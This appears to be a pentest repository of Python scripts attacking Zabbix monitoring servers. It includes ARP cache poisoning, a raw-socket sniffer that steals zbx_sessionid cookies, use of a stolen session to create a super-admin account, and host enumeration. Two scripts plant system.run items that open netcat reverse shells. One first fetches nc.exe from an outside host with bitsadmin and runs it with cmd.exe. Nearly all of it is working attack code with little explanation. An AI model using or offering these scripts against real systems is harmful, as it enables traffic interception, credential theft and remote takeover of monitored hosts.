├── README.md ├── arp_cache_poison_scapy.py ├── zabbix_bitsadmin_nc_download.py ├── zabbix_host_scan_by_pyzabbix.py ├── zabbix_shell_create_on_Linux.py ├── zabbix_user_create_by_zbxsessionid.py ├── zabbix_version_detect.py └── zabbix_zbxsessionid_sniffer.py /README.md: -------------------------------------------------------------------------------- 1 | # zabbix_test 2 | ## this is some scripts for testing zabbix server 3 | 4 | * zabbix_version_detect.py - for detect version of zabbix server 5 | 6 | * zabbix_zbxsessionid_sniffer.py - to catch zbx_sessionid after arp casche poison 7 | 8 | * zabbix_user_create_by_zbxsessionid.py - create user by catched zbx_sessionid 9 | 10 | * zabbix_host_scan_by_pyzabbix.py - scan host by created zabbix user 11 | 12 | * zabbix_shell_create_on_Linux.py - create shell by using system.run and new ser creds 13 | 14 | * zabbix_bitsadmin_nc_download.py - download nc to winpc (for creating and running tunnel) 15 | 16 | * arp_cache_poison_scapy.py - some implementation of arp casche poison pentest 17 | -------------------------------------------------------------------------------- /arp_cache_poison_scapy.py: -------------------------------------------------------------------------------- 1 | 2 | import argparse 3 | import os 4 | import sys 5 | from scapy.all import * 6 | 7 | interface = raw_input("interface: \n") 8 | victimIP = raw_input("victim: \n") 9 | routerIP=raw_input("router: \n") 10 | 11 | def MACsnag(IP): 12 | ans, unans = arping(IP) 13 | for s, r in ans: 14 | return r[Ether].src 15 | # ip="192.168.56.101" 16 | 17 | def Spoof(routerIP, victimIP): 18 | victimMAC = MACsnag(victimIP) 19 | routerMAC = MACsnag(routerIP) 20 | send(ARP(op =2, pdst = victimIP, psrc = routerIP, hwdst = victimMAC)) 21 | send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = routerMAC)) 22 | 23 | def Restore(routerIP, victimIP): 24 | victimMAC = MACsnag(victimIP) 25 | routerMAC = MACsnag(routerIP) 26 | send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc= victimMAC), count = 4) 27 | send(ARP(op = 2, pdst = victimIP, psrc = routerIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = routerMAC), count = 4) 28 | 29 | def sniffer(): 30 | pkts = sniff(iface = interface, count = 10, prn=lambda x:x.sprintf(" Source: %IP.src% : %Ether.src%, \n %Raw.load% \n\n Reciever: %IP.dst% \n +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n")) 31 | wrpcap("temp.pcap", pkts) 32 | 33 | def MiddleMan(): 34 | os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") 35 | while 1: 36 | try: 37 | Spoof(routerIP, victimIP) 38 | time.sleep(1) 39 | sniffer() 40 | except KeyboardInterrupt: 41 | Restore(routerIP, victimIP) 42 | os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") 43 | sys.exit(1) 44 | 45 | 46 | if __name__ == "__main__": 47 | MiddleMan() 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /zabbix_bitsadmin_nc_download.py: -------------------------------------------------------------------------------- 1 | from pyzabbix import ZabbixAPI, ZabbixAPIException 2 | import sys 3 | 4 | 5 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 6 | user= raw_input("enter username: \n") 7 | password= raw_input("enter password: \n") 8 | host_name=raw_input("enter hostname: \n") 9 | # hostid=raw_input("enter hostid: \n") 10 | 11 | zapi = ZabbixAPI(api_address) # user='Admin', password='zabbix') 12 | 13 | # Login to the Zabbix API 14 | zapi.login(user, password) 15 | 16 | # host_name = 'Zabbix_server' 17 | 18 | # host_name = "windows host" 19 | 20 | hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"]) 21 | if hosts: 22 | host_id = hosts[0]["hostid"] 23 | print("Found host id {0}".format(host_id)) 24 | 25 | try: 26 | item = zapi.item.create( 27 | hostid=host_id, 28 | name='netcat_create_reverse_shell', 29 | key_='system.run["bitsadmin.exe /transfer /download http://192.168.56.100/nc.exe C:\\Users\\Public\\nc.exe && C:\Users\\Public\\nc.exe 192.168.56.100 5555 -e cmd.exe"]', 30 | type=0, 31 | value_type=4, 32 | interfaceid=hosts[0]["interfaces"][0]["interfaceid"], 33 | delay=30 34 | ) 35 | except ZabbixAPIException as e: 36 | print(e) 37 | sys.exit() 38 | print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name)) 39 | else: 40 | print("No hosts found") 41 | -------------------------------------------------------------------------------- /zabbix_host_scan_by_pyzabbix.py: -------------------------------------------------------------------------------- 1 | import ast 2 | from pyzabbix import ZabbixAPI 3 | 4 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 5 | #zbx_sessionid= raw_input("enter zbx_sessionid: \n") 6 | user= raw_input("enter username: \n") 7 | password= raw_input("enter password: \n") 8 | 9 | zapi = ZabbixAPI(api_address) 10 | zapi.login(user, password) 11 | print("Connected to Zabbix API Version %s" % zapi.api_version()) 12 | 13 | for h in zapi.host.get(output="extend"): 14 | hostid=h['hostid'] 15 | host=h['host'] 16 | print ("found host: ",host,"hostid: ",hostid) 17 | -------------------------------------------------------------------------------- /zabbix_shell_create_on_Linux.py: -------------------------------------------------------------------------------- 1 | from pyzabbix import ZabbixAPI, ZabbixAPIException 2 | import sys 3 | 4 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 5 | user= raw_input("enter username: \n") 6 | password= raw_input("enter password: \n") 7 | hostname=raw_input("enter hostname: \n") 8 | # hostid=raw_input("enter hostid: \n") 9 | 10 | zapi = ZabbixAPI(api_address) 11 | 12 | # Login to the Zabbix API 13 | zapi.login(user, password) 14 | 15 | host_name = hostname 16 | hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"]) 17 | if hosts: 18 | host_id = hosts[0]["hostid"] 19 | print("Found host id {0}".format(host_id)) 20 | 21 | try: 22 | item = zapi.item.create( 23 | hostid=host_id, 24 | name='netcat_create_reverse_shell', 25 | key_='system.run["nc 192.168.56.100 4444 -e /bin/bash"]', 26 | type=0, 27 | value_type=4, 28 | interfaceid=hosts[0]["interfaces"][0]["interfaceid"], 29 | delay=5 30 | ) 31 | except ZabbixAPIException as e: 32 | print(e) 33 | sys.exit() 34 | print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name)) 35 | else: 36 | print("No hosts found") 37 | 38 | -------------------------------------------------------------------------------- /zabbix_user_create_by_zbxsessionid.py: -------------------------------------------------------------------------------- 1 | import json 2 | import requests 3 | from pyzabbix import ZabbixAPI 4 | 5 | 6 | #api_address="http://192.168.56.102/zabbix/api_jsonrpc.php" 7 | api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n") 8 | zbx_sessionid= raw_input("enter zbx_sessionid: \n") 9 | user= raw_input("enter username: \n") 10 | password= raw_input("enter password: \n") 11 | 12 | url = api_address 13 | headers = {'Content-type': 'application/json'} 14 | data = {"jsonrpc": "2.0", "method": "user.create", "params": { 15 | "alias": user, "passwd": password, "type": "3", "usrgrps": [ 16 | {"usrgrpid": "7"}], }, 17 | "auth": zbx_sessionid, 18 | "id": 1 19 | } 20 | answer = requests.post(url, data=json.dumps(data), headers=headers) 21 | print(answer) 22 | response = answer.json() 23 | print(response) 24 | print ("testing user parameters:") 25 | zapi = ZabbixAPI(api_address) 26 | zapi.login(user, password) 27 | print("Connected to Zabbix API Version %s" % zapi.api_version()) 28 | # data = {"jsonrpc": "2.0", "method": "user.login", "params": { 29 | # "user": user, "passwd": password }, 30 | # "auth": None, 31 | # "id": 1 32 | # } 33 | # answer = requests.post(url, data=json.dumps(data), headers=headers) 34 | # print(answer) 35 | # response = answer.json() 36 | # print(response) 37 | -------------------------------------------------------------------------------- /zabbix_version_detect.py: -------------------------------------------------------------------------------- 1 | """ 2 | This script is for testing zabbix version 3 | by version of the docs on the logon page 4 | """ 5 | 6 | import urllib2 7 | import re 8 | from bs4 import BeautifulSoup 9 | 10 | zab_page='http://192.168.56.102/zabbix/index.php' 11 | page=urllib2.urlopen(zab_page) 12 | soup = BeautifulSoup(page, 'html.parser') 13 | for link in soup.findAll('a', attrs={'href': re.compile("documentation")}): 14 | version=link.get('href') 15 | 16 | parts=re.split('/', version) 17 | 18 | a=''.join (parts[4:5]) 19 | print "zabbix version is",a 20 | -------------------------------------------------------------------------------- /zabbix_zbxsessionid_sniffer.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import re 3 | 4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800)) 5 | 6 | print ("trying to catch zbx_sessionid") 7 | k = '' 8 | while True: 9 | data = s.recvfrom(65565) 10 | try: 11 | # s,m,k='' 12 | if "HTTP" in data[0][54:]: 13 | # print "[","="*30,']' 14 | raw = data[0][54:] 15 | if "\r\n\r\n" in raw: 16 | line = raw.split('\r\n\r\n')[0] 17 | print "[*] Header Captured " 18 | # print line[line.find('HTTP'):] 19 | value = line 20 | 21 | m = re.search("(zbx_sessionid.*)", value) 22 | if m: 23 | # This is reached. 24 | # print("search:", m.group(0)) 25 | str = m.group(0) 26 | k = re.split(r'\W+', str) 27 | print ("session_id is :") 28 | 29 | print (k[1]) 30 | ####Saving founded zbx_sessionid in file 31 | # print (date) 32 | saved_zbxssids = open('zbx_sessionids.txt','a') 33 | saved_zbxssids.write('\n') 34 | # date = str(datetime.now()) 35 | saved_zbxssids.write(k[1]) # or whith date: saved_zbxssids.write(k[1]+ ' ' + date) 36 | saved_zbxssids.write('\n') 37 | # saved_zbxssids.write(date) 38 | saved_zbxssids.close() 39 | print ("zabbix session id saved in file zbx_sessionids.txt") 40 | 41 | # m = '' 42 | else: 43 | pass 44 | # print raw 45 | else: 46 | # print '[{}]'.format(data) 47 | pass 48 | except KeyboardInterrupt: 49 | s.close() 50 | 51 | --------------------------------------------------------------------------------